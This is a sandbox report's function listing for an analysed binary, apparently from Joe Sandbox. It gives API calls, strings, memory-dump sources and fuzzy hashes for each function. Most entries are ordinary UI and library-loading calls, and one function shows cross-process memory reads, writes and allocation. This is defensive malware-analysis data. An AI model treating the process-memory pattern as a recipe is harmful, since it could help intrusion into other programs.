Instruction ID: f1ce79aeaacea912f8e0a3c40c2ac45d4a9fd2ebaa57becc5af340ecc816ecb2
Opcode Fuzzy Hash: ee8296cd58475ae58c9e05050c81e1358f145caf14b03f8bc929a3882d73084f
Instruction Fuzzy Hash: 42F0C930004706AFDB195F2AED08B643FE5B701322F188265F8A9981F0D7328AD9DF30

Function 00D8FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D8FAB2
CoCreateInstance.COMBASE(00DCDA7C,00000000,00000001,00DCD8EC,?), ref: 00D8FACA

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

CoUninitialize.COMBASE ref: 00D8FD2D

Strings

.lnk, xrefs: 00D8FA63, 00D8FA68, 00D8FA76

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 9603f060884936886cc103b92df749a142c309fdd27514f53d57a1ee3c463ad8
Instruction ID: 7a2b7d5eda20853bfcca0615759de2edfb5348ef7fd38e1a2dde4cc9e4286eb8
Opcode Fuzzy Hash: 9603f060884936886cc103b92df749a142c309fdd27514f53d57a1ee3c463ad8
Instruction Fuzzy Hash: B5A14A71508305AFD700EF64C892EABB7E9EF88704F40491DF59597192EB70EA09CBB2

Function 00D5DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

#, xrefs: 00D5DA9D
+, xrefs: 00D5DA96

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 57da64e709ad38ff1dbc10492e5a67b26d87d7b274169b0cb9481036820d6b44
Instruction ID: c7600194abcdb5662a8e1c1ce9d932e087fe2e72b339897495c2ef2f58d99a0c
Opcode Fuzzy Hash: 57da64e709ad38ff1dbc10492e5a67b26d87d7b274169b0cb9481036820d6b44
Instruction Fuzzy Hash: 1551DB34104246CFDF25EF68C485AEA3BB6EF26311F184055FC929B292D7349C4AD735

Function 00D8503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00DDDC40,?,0000000F,0000000C,00000016,00DDDC40,?), ref: 00D8507B

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

Part of subcall function 00D4B8A7: _memmove.LIBCMT ref: 00D4B8FB

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00D850FB

Strings

THIS, xrefs: 00D85139
REMOVE, xrefs: 00D850AC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf_memmove
String ID: REMOVE$THIS
API String ID: 2528338962-776492005
Opcode ID: f07eb78dd2203ad30685ff30e51cbfbb76648702af39c085d289e8937174312b
Instruction ID: 6e48833569ba78e0649a7b95cebe324bd3ed169c025b4fb75e87f04f65c8dfa5
Opcode Fuzzy Hash: f07eb78dd2203ad30685ff30e51cbfbb76648702af39c085d289e8937174312b
Instruction Fuzzy Hash: 9041AF74A0060A9FCF01EF64D885AAEB7B5FF48314F088469E85AAB356DB34DD45CB70

Function 00D7CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D84D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D7C9FE,?,?,00000034,00000800,?,00000034), ref: 00D84D6B

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D7CFC9

Part of subcall function 00D84D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D7CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00D84D36

Part of subcall function 00D84C65: GetWindowThreadProcessId.USER32(?,?), ref: 00D84C90
Part of subcall function 00D84C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D7C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00D84CA0
Part of subcall function 00D84C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D7C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00D84CB6

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7D036
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D7D083

Strings

@, xrefs: 00D7D09B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c35f325013c67f96e8cca99869396eed0e022da3d74e80ac27e670a074e10b54
Instruction ID: 115785bf20822680fb6af9ff9100980bfc27d20a0a2d184cbeb9bd2e88a545c6
Opcode Fuzzy Hash: c35f325013c67f96e8cca99869396eed0e022da3d74e80ac27e670a074e10b54
Instruction Fuzzy Hash: A7412976900219AFDB10EFA4CC85FEEBBB8EF49700F148095EA49B7181DA716E45CB71

Function 00DAA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DDDBF0,00000000,?,?,?,?), ref: 00DAA4E6
GetWindowLongW.USER32 ref: 00DAA503
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DAA513

Strings

SysTreeView32, xrefs: 00DAA4B8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 826653e50ac9c71d3dc6e13aea3acf94ea14ad65652a1c0d113da1b17a5009eb
Instruction ID: 69d1408c245673788cf027220faa7a60aeb0cd54486fa235aba775f7fb3a58fd
Opcode Fuzzy Hash: 826653e50ac9c71d3dc6e13aea3acf94ea14ad65652a1c0d113da1b17a5009eb
Instruction Fuzzy Hash: F331A031500606AFDB119E38CC45BE67BA9EB4A324F244725F979922E0D770E854DB70

Function 00DAA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DAA74F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DAA75D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DAA764

Strings

msctls_updown32, xrefs: 00DAA6C9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1d6aee4dc91245b1d7f6324249dde1c4066e6121a1538759c68681b8a897d6b6
Instruction ID: 58f4fff54ed6ff5d05996ca3d9cd12daea5827d15f008e09c15a4d617ff52228
Opcode Fuzzy Hash: 1d6aee4dc91245b1d7f6324249dde1c4066e6121a1538759c68681b8a897d6b6
Instruction Fuzzy Hash: 78215CB5600209AFDB14DF68CCC1EA737ADEB4A394B084559FA019B2A1CB71ED51CAB1

Function 00DA97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DA983D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DA984D
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DA9872

Strings

Listbox, xrefs: 00DA980A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 01a86e31f9db3cab63e50afc1706fb8902181288ea7dead25bb4e708f9901c96
Instruction ID: 9c6058fe061f49b861be60590cf0ce7fb13f53d006165e9670fe008c1206d841
Opcode Fuzzy Hash: 01a86e31f9db3cab63e50afc1706fb8902181288ea7dead25bb4e708f9901c96
Instruction Fuzzy Hash: 2821D432610218BFEF118F64CC85FBB7BAAEF8A754F018124F9449B190C6719C52CBB0

Function 00DAA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DAA27B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DAA290
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DAA29D

Strings

msctls_trackbar32, xrefs: 00DAA252

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1961d052552360bfdf9b01b2391659cfdd4337fd371a7fe267105e1335a04294
Instruction ID: 0fa1b4a6100cb44f089812acd2249b7b44ac85056bd6babbd20797e35fb39096
Opcode Fuzzy Hash: 1961d052552360bfdf9b01b2391659cfdd4337fd371a7fe267105e1335a04294
Instruction Fuzzy Hash: 9F110671240308BFEF245F65CC46FA73BA9EF89B54F024219FA45A6090D372E861CB74

Function 00D62F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00D62F79
GetProcAddress.KERNEL32(00000000), ref: 00D62F80

Strings

combase.dll, xrefs: 00D62F74
RoInitialize, xrefs: 00D62F68

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 2f93235b68733dc4d19def2fc2e1721fedab300ebae11896b210bc6d7188147a
Instruction ID: 4c1016ba2a68a4fe633c44936bd2425a17a047a0b27379eb147dc2cd5fd8420a
Opcode Fuzzy Hash: 2f93235b68733dc4d19def2fc2e1721fedab300ebae11896b210bc6d7188147a
Instruction Fuzzy Hash: 2CE01AB0695302AFDB105F77EC49F253666AB10706F048028F106E21A0CBB64088DF28

Function 00D63034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D62F4E), ref: 00D6304E
GetProcAddress.KERNEL32(00000000), ref: 00D63055

Strings

RoUninitialize, xrefs: 00D6303D
combase.dll, xrefs: 00D63049

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 7b4ad7f989cbb77c96e136ba5bdd19b734e9beea8b942351d0bd9f044910e267
Instruction ID: d1d34e00fdca5a51f845bf0447dc2e162312036a4ae12c3c50f288ee122a56f6
Opcode Fuzzy Hash: 7b4ad7f989cbb77c96e136ba5bdd19b734e9beea8b942351d0bd9f044910e267
Instruction Fuzzy Hash: CAE0B6B0646302AFDB205F62ED0DB153A65F714712F184028F209E22B4CBB64548CB38

Function 00DBBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00DBBA58
__swprintf.LIBCMT ref: 00DBBA8C

Strings

WIN_XPe, xrefs: 00DBBACB
%.3d, xrefs: 00DBBA66

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 420f201a8c5a78803960308cbe48eec6f227e99f4d97719b6eb17513391b6b7c
Instruction ID: 9783b4f0b50360798cecb8555ce4ad696fc889af28b8332db79d03f92a119852
Opcode Fuzzy Hash: 420f201a8c5a78803960308cbe48eec6f227e99f4d97719b6eb17513391b6b7c
Instruction Fuzzy Hash: 60E0EC71C0811CEACA6496908C069FA737CAB04310F108493BD97D2040E7B5DB58AB31

Function 00DA20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DA20EC,?,00DA22E0), ref: 00DA2104
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DA2116

Strings

GetProcessId, xrefs: 00DA2110
kernel32.dll, xrefs: 00DA20FF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: ab2efbeddf65bb14e8c33634e001a255e0717e4392387a8bca64521e5a863cc6
Instruction ID: ab1ebb16c0130f44b17c8b7314d012f55779ae72bbfcbdc4b4d6ac5a5f82c894
Opcode Fuzzy Hash: ab2efbeddf65bb14e8c33634e001a255e0717e4392387a8bca64521e5a863cc6
Instruction Fuzzy Hash: 19D0A7744003138FD7206F66EC0EA2236E4AB04314B19842DE749D1394D770C480CA70

Function 00D5E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D5E6D9,?,00D5E55B,00DDDC28,?,?), ref: 00D5E6F1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D5E703

Strings

IsWow64Process, xrefs: 00D5E6FD
kernel32.dll, xrefs: 00D5E6EC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: daab647a15d53060a76f1d69c6b4a38a50dfa95fd127f51536638c250fbc5721
Instruction ID: eb07a021c752e542eb21b39a614b73f2d98123d253ecd8b2d026c169b6f16ffc
Opcode Fuzzy Hash: daab647a15d53060a76f1d69c6b4a38a50dfa95fd127f51536638c250fbc5721
Instruction Fuzzy Hash: FED0A9344403138FDB243F21EC4CA633BE8BB08306B29842EFDA5D2250DBB0C8888A30

Function 00D5E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D5E69C,771B0AE0,00D5E5AC,00DDDC28,?,?), ref: 00D5E6B4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D5E6C6

Strings

GetNativeSystemInfo, xrefs: 00D5E6C0
kernel32.dll, xrefs: 00D5E6AF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 44cf20f4c1e8848fef8e47894da2e4773995aa47521ea49c3feae5573e751f90
Instruction ID: dd6c048a23faad050a057e741f42cbaa74e83c956fa37c1104c8f276a108eee7
Opcode Fuzzy Hash: 44cf20f4c1e8848fef8e47894da2e4773995aa47521ea49c3feae5573e751f90
Instruction Fuzzy Hash: A0D0A7344403238FDB207F31EC08A2237E4AB24306B19982DFD59D1260D770C4848630

Function 00D9EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D9EBAF,?,00D9EAAC), ref: 00D9EBC7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D9EBD9

Strings

GetSystemWow64DirectoryW, xrefs: 00D9EBD3
kernel32.dll, xrefs: 00D9EBC2

Memory Dump Source

